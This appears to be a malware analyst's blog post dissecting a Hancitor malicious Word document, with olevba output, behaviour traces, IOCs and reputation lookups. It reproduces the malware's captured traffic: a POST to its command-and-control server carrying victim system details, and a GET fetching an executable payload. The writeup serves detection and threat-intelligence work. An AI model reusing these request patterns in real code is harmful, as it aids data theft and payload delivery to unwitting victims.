2020-12-08 Hancitor Malspam

Summary
========
This quick post stems from a tweet from @James_inthe_box about some Hancitor malware that he was seeing. After several attempts at trying to get a maldoc to download in the past, I was able to today. Out of the several links that I had, only one worked. For a list of other links that I saw, please see this Pastebin. The others did what they have always done in the past – redirected me to a Docusign site. For the artifacts and such, please see my Github repo for this here.

Analysis
========
Once the maldoc was obtained, I figured that I would take a look at it using Didier’s strings.py script to see if anything stood out (using the -L option to sort the strings from smallest to largest). What I noticed right off the bat were some strings such as the following:

OpenMutexA
LoadImageA
USER32.dll
Local\Temp
& "\ya.0wav"
ShellExecute
Get-Credential. 
Process.Start" 
Windows PowerShell 4
ll,DllUnregisterServer
C:\Users\win7home\AppData\Local\Temp\ya.wav
C:\Users\win7home\Desktop\Builder_v5\ya.wav
c:\DuckVowel\tootree\BlowSpot\complete.pdb

Not seeing much of anything else, I jumped over to olevba to see what I could glean from that using the -decode and -deobf flags. Here is the end part from that run (which it was able to decode the macro as well):

+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|ShellExecute        |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Shell32             |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Call                |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|VBA obfuscated      |VBA string expressions were detected, may be |
|          |Strings             |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |W0rd.dll            |Executable file name                         |
|Hex String|'\x00\x02\t\x06'    |00020906                                     |
|Hex String|'\x00\x00\x00\x00\x0|000000000046                                 |
|          |0F'                 |                                             |
|Base64    |'2nt'               |Module10                                     |
|String    |                    |                                             |
|Base64    |'2nv'               |Module12                                     |
|String    |                    |                                             |
|Base64    |'2nu'               |Module11                                     |
|String    |                    |                                             |
|Base64    |'I'                 |Scri                                         |
|String    |                    |                                             |
|VBA string|\W0rd.d             |"\W" & "0rd.d"                               |
|VBA string|Local\Temp          |"Loc" & "al\Te" & "mp"                       |
|VBA string|pting.FileSystemObje|"pting.FileSystem" & "Object"                |
|          |ct                  |                                             |
+----------+--------------------+---------------------------------------------+

From glancing through the macro, the macro goes and downloads a file and names it “ya.wav” which is located in the “Local\%Temp%” directory. Looking through the deobfuscated macro, I also do see a call in there for “DllUnregisterServer” which is where the “w0rd.dll” file comes into play most likely. Since I did not see much else here in the code, I went ahead and ran it on my VM.

From here I could see that I was pretty close on what the macro was doing. Once the maldoc was run there was a call out to “api.ipify.org” to get my IP address and then a POST to “maduabin[.]com/8/forum[.]php” with details of my system and a response back:

POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: maduabin.com
Content-Length: 113
Cache-Control: no-cache

GUID=12447747362005647368&BUILD=0712_843923&INFO=BILL-PC @ Bill-PC\Bill&EXT=&IP=212.102.37.91&TYPE=1&WIN=6.1(x64)HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 08 Dec 2020 17:36:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

NBYMARhAEg4OCkBVVR0bHh8cFQgPCQkfFBsOH1QZFRdVDxMNDxMSTklUHwIfBw==

I then saw that there was a GET request for a binary called “uiwuih43.exe” which is what I am assuming is the “w0rd.dll”:

GET /uiwuih43.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: gadeforussenate.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Dec 2020 17:36:40 GMT
Content-Type: application/octet-stream
Content-Length: 431995
Connection: keep-alive
Last-Modified: Tue, 08 Dec 2020 17:47:57 GMT
ETag: "5fcfbc4d-6977b"
Accept-Ranges: bytes

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

$.......PE..L......_.V..0.....'......P...&...............`....@...........................................

Once this is downloaded to the “C:\Users\%username%\AppData\Local\Temp\” directory and named “ya.wav,” it was then renamed and moved over to the “C:\Users\%username%\AppData\Roaming\Microsoft\Templates\W0rd.dll” folder. From here it was then registed via rundll32.exe as seen below:

From here, rundll32.exe (PID 1588) proceeded to spawn a child process of itself (PID 1776). Both of these PIDs proceeded to talk outbound with the domain “maduabin[.]com” in the form of POSTs which was similar to the POST seen above.

Using some of the filters for ProcMon which I got from here I noticed some of the following things:

- rundll32.exe (PID 1776) created a svchost.exe (PID 2224) which started reading various application paths and system paths on the filesystem
 - Also looked for anything bitcoin/bitcoin wallets related
- svchost.exe (PID 2224) performed a lookup using "api.ipify.org" and created a file called "kaosdma.txt" with the public IP address of my VM (artifact was left in C:\Users\%username%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KCT28PHI\ path)
- rundll32.exe (PID 1776) looked at various registry keys dealing with internet access

At the time of this writing, I did not see any signs of persistence setup on the VM. I also noticed that in the PCAP, the VM was communicating with a couple of various IP addresses using TCP ports 1034-1043. UDP usage did not show any oddities.

Artifacts
==========

IOCs
—–—
185.68.93.10 / maduabin.com (TCP/80)
185.18.52.47 (TCP/80)
8.208.96.63 / gadeforussenate.com (TCP/80)
93.184.220.29 / (TCP/80)
23.21.252.4 / (TCP/80)
54.225.220.115 / (TCP/80)
8.248.113.254 / (TCP/80)

File hashes
——————–
2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238 – 1208_37832604.doc
ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b – W0rd.dll

Machinae results
—————–———–
********************************************************************************
* Information for 185.68.93.10
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 1
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-12-03’, ‘bandieve[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-02’, ‘eaussill[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-08’, ‘maduabin[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-09’, ‘spardethe[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://spardethe[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXps://maduabin[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://maduabin[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://maduabin[.]com/8/forum[.]php/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://eaussill[.]com/8/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://maduabin[.]com/8/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-07’, ‘hXXp://bandieve[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-06’, ‘hXXp://eaussill[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-04’, ‘hXXp://bandieve[.]com/8/forum[.]php/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-04’, ‘hXXp://bandieve[.]com/8/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-04’, ‘hXXps://bandieve[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-03’, ‘hXXps://eaussill[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-03’, ‘hXXp://eaussill[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-03’, ‘hXXp://eaussill[.]com/8/forum[.]php/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-02’, ‘hXXp://eaussill[.]com/8/’)
[-] No ThreatCrowd IP Report Results

********************************************************************************
* Information for maduabin.com
* Observable type: fqdn (Auto-detected: True)
********************************************************************************
[-] No URLVoid Results
[-] No URL Unshorten Results
[-] No Malc0de Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-12-08’, ‘185[.]68.93.10’)
[-] No McAfee Threat Results

********************************************************************************
* Information for 185.18.52.47
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 1
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-12-01’, ‘kvmnl01-22132[.]fornex[.]org’)
[-] pDNS data from VirusTotal: (‘2020-11-26’, ‘otsoebabe[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXps://otsoebabe[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://otsoebabe[.]com/8/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-07’, ‘hXXp://cussoricti[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-01’, ‘hXXp://otsoebabe[.]com/8/forum[.]php/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-01’, ‘hXXp://otsoebabe[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-11-20’, ‘hXXp://185[.]18.52.47/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-11-11’, ‘hXXps://cussoricti[.]com/’)
[-] No ThreatCrowd IP Report Results

********************************************************************************
* Information for 8.208.96.63
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-12-09’, ‘gade4senate[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-09’, ‘gadebrigade[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-08’, ‘gadeforsenate[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-09’, ‘gadeforsenator[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-08’, ‘gadeforussenate[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://gadeforussenate[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://gadeforussenate[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://gadeforussenate[.]com/163.exe/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://gadeforussenate[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXps://gadeforussenate[.]com/’)
[-] No ThreatCrowd IP Report Results

********************************************************************************
* Information for gadeforussenate.com
* Observable type: fqdn (Auto-detected: True)
********************************************************************************
[-] No URLVoid Results
[-] No URL Unshorten Results
[-] No Malc0de Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Business
[-] No McAfee Threat Results

********************************************************************************
* Information for 93.184.220.29
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 110
[-] No RansomwareTracker Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Information and Computer Security
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-11-23’, ‘sg[.]symcb[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-07’, ‘hXXp://93[.]184.220.29/’)
[-] No McAfee Threat Results
[+] ThreatCrowd IP Report Results
[-] Passive DNS: (‘cdn[.]digicert[.]com’, ‘2020-11-10’)
[-] Passive DNS: (‘ocsp.digicert.com.69.1.6c6969c6[.]roksit[.]net’, ‘2020-11-28′)
[-] Passive DNS: (’93[.]184.220.29’, ‘2020-12-02’)
[-] Passive DNS: (‘bvsebn4jzwc57mggqcjqs3nrju.1.0.jglcsapd2lcyqqbypj4luwor5y.3w4t3ha[.]dns0[.]org’, ‘2020-12-09’)
[-] Known Malware Hash: 008d61c7e71f71815810ccacf54f4fc2
[-] Known Malware Hash: 02767e8cc7c3a80bb2e2b1cb1ccdcf5b
[-] Known Malware Hash: 03e65fbca95c55b2cb40ba0fa8aa16b4
[-] Known Malware Hash: 0dc99c742a9346aa8474528b64a3bbd4
[-] Known Malware Hash: 12219fa7c6864ef90d8a700dc2660450
[-] Known Malware Hash: 1408cea92978508640d1dee4e22b5384
[-] Known Malware Hash: 155ca23cd8f32e6b949de4863e08726c
[-] Known Malware Hash: 16f16b191c01042dab2cca8406ac37a8
[-] Known Malware Hash: 1a11f106ceb01bd7fa55612b45170c6a
[-] Known Malware Hash: 1c47579a3f9d728377e956a4207cef27
[-] Known Malware Hash: 2104c98cf906bb7d3a88b7e471e8e316
[-] Known Malware Hash: 22172af4761a14a9c9fd3fb25c7e9181
[-] Known Malware Hash: 222dc070ac4d8fdbb2c4645750a72e86
[-] Known Malware Hash: 287f6de92849fba5203f94b419d52ea4
[-] Known Malware Hash: 28f2b86fcb7b7cecd36923dfcfeb2456
[-] Known Malware Hash: 297479a976ea14118b83afbad3bb3f44
[-] Known Malware Hash: 2e3856e60726d447c224fec9d6b3efe2
[-] Known Malware Hash: 32753b03512d3ae84e2b3d71560ad1bd
[-] Known Malware Hash: 34401354c1818242012f6180ece7f051
[-] Known Malware Hash: 34f424a1c9d08bf131689d2e5e80e710
[-] Known Malware Hash: 364e3660e4399c213eaf2c83506ca795
[-] Known Malware Hash: 39b905e9a7939e6ebdda9a85af651b6d
[-] Known Malware Hash: 3d7f076e745efa6c2bbd637b4bdcdf4b
[-] Known Malware Hash: 400cd3412b77e8e8957b55120f05b064
[-] Known Malware Hash: 407816c12d7b15024f8535e1886de4e3
[-] Known Malware Hash: 43a863cec165857b55138a3bb7ba80af
[-] Known Malware Hash: 453079c819bcca32275ca2fc5d5d409b
[-] Known Malware Hash: 4577b4f37e8e017a877ccb6a39240b80
[-] Known Malware Hash: 47c35a5770035289fe8d8fea77bce2b8
[-] Known Malware Hash: 48a058e3f4fd7adef124ef7c2147bd26
[-] Known Malware Hash: 4ab037cbd928234b267e01a25c91f76c
[-] Known Malware Hash: 4b73d2c8f843090d98035437a9f73e6a
[-] Known Malware Hash: 4cccf7e01d0e58b25b88359826acf9af
[-] Known Malware Hash: 4e8177209842471212715c5f7f2d8801
[-] Known Malware Hash: 51a3c0cbf6cd201396dcf2f5f3612af7
[-] Known Malware Hash: 545432a74263cef73fe99f5888747b8e
[-] Known Malware Hash: 5985d8286f913fd3eeb5101318c69718
[-] Known Malware Hash: 59a6501d0c16bd6c8e56a09dda0cb4bd
[-] Known Malware Hash: 5acc539355258122f8cdc7f5c13368e1
[-] Known Malware Hash: 5e46640828bdf9fbad37b5178dcd1dd9
[-] Known Malware Hash: 644536250fedb45b2cae354cda11aeef
[-] Known Malware Hash: 672b221378f53c9b2a45f6ff100be357
[-] Known Malware Hash: 6745fa5768222f5bde3a1fa6c774b28e
[-] Known Malware Hash: 69e6900cd860737eeba9b2b3bf0d71b4
[-] Known Malware Hash: 6f26014edcf48dc0f4588a08b3a78fa3
[-] Known Malware Hash: 7195376e8087cc1f388bcede563077e3
[-] Known Malware Hash: 768646c048513a0906b7f5df3bc5ed3c
[-] Known Malware Hash: 7a6f420348d5a06a6a22482a59f4fe9d
[-] Known Malware Hash: 7b7bc095ab57ea9e1b95f69ec3339ba5
[-] Known Malware Hash: 7e6185bac1c37b59074f35e2b7108093
[-] Known Malware Hash: 826b425d88600d44127bb1c887b8e706
[-] Known Malware Hash: 834eac4e8dcb1e25d97c86cd1c673f5b
[-] Known Malware Hash: 85c004bf3ab8cf01662cb288ea9ae5db
[-] Known Malware Hash: 8adb8c91d0d5ec2f107b21997978e7b6
[-] Known Malware Hash: 8bfa9f96c3da4b8a4a5bafa99fba258c
[-] Known Malware Hash: 92fe5ff45c1b0b952cf95894d3e5f039
[-] Known Malware Hash: 9366f36464a6f66daf3dd18aad620d4b
[-] Known Malware Hash: 96aadac7d3a0616bcaf9b5d1001ace57
[-] Known Malware Hash: 98c1ad5734e5889302edb695241c70ad
[-] Known Malware Hash: 99017441b34a09bc449e8a7307243f4b
[-] Known Malware Hash: 9e7e95d726b0d3e5cfb69ab90eddfe4e
[-] Known Malware Hash: a39f7f890e4aa66827afb5511ec8623b
[-] Known Malware Hash: a85ff92b8bf166872885b29e77807115
[-] Known Malware Hash: a9e4734d2f50e9a884f43c0cb1e46f46
[-] Known Malware Hash: ad9df601fbcc60413af1c0637717add4
[-] Known Malware Hash: b1e2ae56447ee9ee9bc3178490e0155b
[-] Known Malware Hash: b8b35f26235ae10b4f97195a3c04bfde
[-] Known Malware Hash: b8bbef3f4d7ba13c5bde0849731718dd
[-] Known Malware Hash: c0d3eacc48a41057de0838c09b97a3a7
[-] Known Malware Hash: c2d8ee8e7603da95fafeaf018bac99f9
[-] Known Malware Hash: c345cc11822bc3005ad6144b0fc15fce
[-] Known Malware Hash: c415a66ab37a072c0279c9f902b85fc2
[-] Known Malware Hash: c65f767a0e2209f1177dbf0955e74eb6
[-] Known Malware Hash: c7a6d45c9fb24e74760c0e85f927532a
[-] Known Malware Hash: d020316652cbfa9eeb97d093e9df9c1f
[-] Known Malware Hash: d8062f01439148efce2b87248ea0f1f7
[-] Known Malware Hash: de70d10aa65617ab056c90375786afbf
[-] Known Malware Hash: e45823ae0d754fc0206f14c1fc43eb74
[-] Known Malware Hash: e4d7099f1c188da54fd1e569f758b4b4
[-] Known Malware Hash: e65ee09c4d5b8ff3ed92279ebf145a90
[-] Known Malware Hash: ea94e325debb0d86d377678130ee8ce6
[-] Known Malware Hash: eb6b7520d0fc4517f523e8305b9ce76d
[-] Known Malware Hash: f1379d73f381f5f5ea486043e26c20ef
[-] Known Malware Hash: feebada441e07bc21ddde1ac9b1eed7e
[-] Known Malware Hash: ffda27dc13dd98337e531cecdba37d7d

********************************************************************************
* Information for 23.21.252.4
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[+] VirusTotal pDNS Results
[-] pDNS malicious URLs from VirusTotal: (‘2020-11-26’, ‘hXXp://23[.]21.252.4/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-11-16’, ‘(hXXp)://api[.]ipify[.]org/’)
[-] No McAfee Threat Results
[+] ThreatCrowd IP Report Results
[-] Passive DNS: (‘ec2-23-21-252-4.compute-1[.]amazonaws[.]com’, ‘2020-12-09’)

********************************************************************************
* Information for 54.225.220.115
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-11-28’, ‘api[.]ipify[.]org’)
[-] pDNS data from VirusTotal: (‘2020-11-27’, ‘elb097307-934924932.us-east-1.elb[.]amazonaws[.]com’)
[-] pDNS data from VirusTotal: (‘2020-11-28’, ‘nagano-19599[.]herokussl[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-03’, ‘(hXXp)://api[.]ipify[.]org/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-02’, ‘(hXXp)://api[.]ipify[.]org/’)
[-] No McAfee Threat Results
[+] ThreatCrowd IP Report Results
[-] Passive DNS: (‘daveluxurylimo[.]ridebitsapp[.]com’, ‘2020-11-22’)
[-] Passive DNS: (‘limo-shuttle-taxi-bkbest[.]ridebitsapp[.]com’, ‘2020-11-25’)
[-] Passive DNS: (‘ec2-54-225-220-115.compute-1[.]amazonaws[.]com’, ‘2020-12-09’)

********************************************************************************
* Information for 8.248.113.254
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 2
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[-] No VirusTotal pDNS Results
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results

********************************************************************************
* Information for 2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
[+] VirusTotal File Report Results
[-] Date submitted: 2020-12-09 07:53:20
[-] Detected engines: 25
[-] Total engines: 62
[-] Scans: (‘Elastic’, ‘malicious (high confidence)’)
[-] Scans: (‘Symantec’, ‘Trojan[.]Gen.2’)
[-] Scans: (‘Avast’, ‘VBS:Obfuscated-gen [Trj]’)
[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan-Dropper.MSOffice[.]SDrop[.]gen’)
[-] Scans: (‘NANO-Antivirus’, ‘Trojan.Ole2[.]Vbs-heuristic[.]druvzi’)
[-] Scans: (‘ViRobot’, ‘DOC.Z[.]Agent.556032.A’)
[-] Scans: (‘F-Secure’, ‘Trojan[.]TR/Kryptik[.]xdzeq’)
[-] Scans: (‘DrWeb’, ‘Trojan[.]Chanitor.59’)
[-] Scans: (‘VIPRE’, ‘LooksLike[.]Macro[.]Malware.k (v)’)
[-] Scans: (‘TrendMicro’, ‘HEUR_VBA.O2’)
[-] Scans: (‘McAfee-GW-Edition’, ‘BehavesLike.OLE2[.]Downloader[.]hg’)
[-] Scans: (‘SentinelOne’, ‘Static AI – Malicious OLE’)
[-] Scans: (‘Avira’, ‘TR/Kryptik[.]xdzeq’)
[-] Scans: (‘Arcabit’, ‘HEUR[.]VBA[.]CG.2’)
[-] Scans: (‘AegisLab’, ‘Trojan[.]MSWord[.]Generic.4!c’)
[-] Scans: (‘ZoneAlarm’, ‘HEUR:Trojan-Dropper.MSOffice[.]SDrop[.]gen’)
[-] Scans: (‘Cynet’, ‘Malicious (score: 85)’)
[-] Scans: (‘TACHYON’, ‘Suspicious/W97[.]NS[.]Gen’)
[-] Scans: (‘VBA32’, ‘BScope[.]TrojanBanker[.]Cridex’)
[-] Scans: (‘ESET-NOD32’, ‘a variant of Win32/GenKryptik[.]EYBL’)
[-] Scans: (‘Rising’, ‘Trojan[.]Generic@ML.90 (RDML:f8Eizix+kbfanr6xWOun9w)’)
[-] Scans: (‘MaxSecure’, ‘Trojan[.]Malware.121218[.]susgen’)
[-] Scans: (‘Fortinet’, ‘W32/GenKryptik[.]EYBY!tr’)
[-] Scans: (‘AVG’, ‘VBS:Obfuscated-gen [Trj]’)
[-] Scans: (‘Qihoo-360’, ‘virus[.]office[.]obfuscated.1’)

********************************************************************************
* Information for ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
[-] No VirusTotal File Report Results

Munin results
—————-
1 / 2 > Unknown
HASH: ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b COMMENT: W0rd.dll
RESULT: – / –
[!] Sample on ANY.RUN URL: https://any.run/report/ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b

2 / 2 > Malicious
HASH: 2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238 COMMENT: 1208_37832604.doc
VIRUS: Kaspersky: HEUR:Trojan-Dropper.MSOffice.SDrop.gen / TrendMicro: HEUR_VBA.O2 / ESET-NOD32: a variant of Win32/GenKryptik.EYBL / Symantec: Trojan.Gen.2 / F-Secure: Trojan.TR/Kryptik.xdzeq
TYPE: – SIZE: 0 FILENAMES: –
FIRST: – LAST: 2020-12-09 07:53:20 SUBMISSIONS: 0 REPUTATION: 0
COMMENTS: 0 USERS: – TAGS:
RESULT: 25 / 62
[!] Sample on ANY.RUN URL: https://any.run/report/2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238

Leave a Reply

Your email address will not be published.